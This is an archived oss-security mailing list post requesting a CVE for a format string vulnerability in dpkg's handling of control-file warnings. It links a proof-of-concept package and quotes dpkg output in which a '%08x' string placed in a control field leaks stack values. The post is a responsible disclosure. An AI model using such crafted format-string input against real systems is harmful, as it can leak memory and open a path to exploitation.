oss-security - CVE-Request: dpkg handling of 'control' and warnings format string vulnerability

Follow @Openwall on Twitter for new release announcements and other news

[<prev] [next>] [thread-next>] [day] [month] [year] [list]

Message-ID: <545B100B.4090601@internot.info>
Date: Thu, 06 Nov 2014 17:07:07 +1100
From: Joshua Rogers <oss@...ernot.info>
To: oss-security@...ts.openwall.com
Subject: CVE-Request: dpkg handling of 'control' and warnings format string
 vulnerability

A format string vulnerability vuln has been found in the latest version
of dpkg.
https://bugs.launchpad.net/ubuntu/+source/dpkg/+bug/1389135

An example is: https://internot.info/docs/dpkg_fstring.deb

> dpkg -i --dry-run
> '/home/www/www.internot.info/htdocs/docs/dpkg_fstring.deb'
> dpkg: warning: parsing file '/tmp/dpkg.heOSnC/control' near line 2
> package 'backup:01f15700.00431828.00000001.00000001.0000001a':
>  '%08x.%08x.%08x.%08x.%08x
> Description: Stuff
> maintainer: Joshua Rogers
> version: 1
> ' is not a valid architecture name: escription: Stuff
> maintainer: Joshua Rogers
> version: 1
>

The vulnerable function, warningv([..]), is called in many other places,
and is not limited to '-i'.

Could I get a CVE-ID for this?

Thanks
-- 
-- Joshua Rogers <https://internot.info/>

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.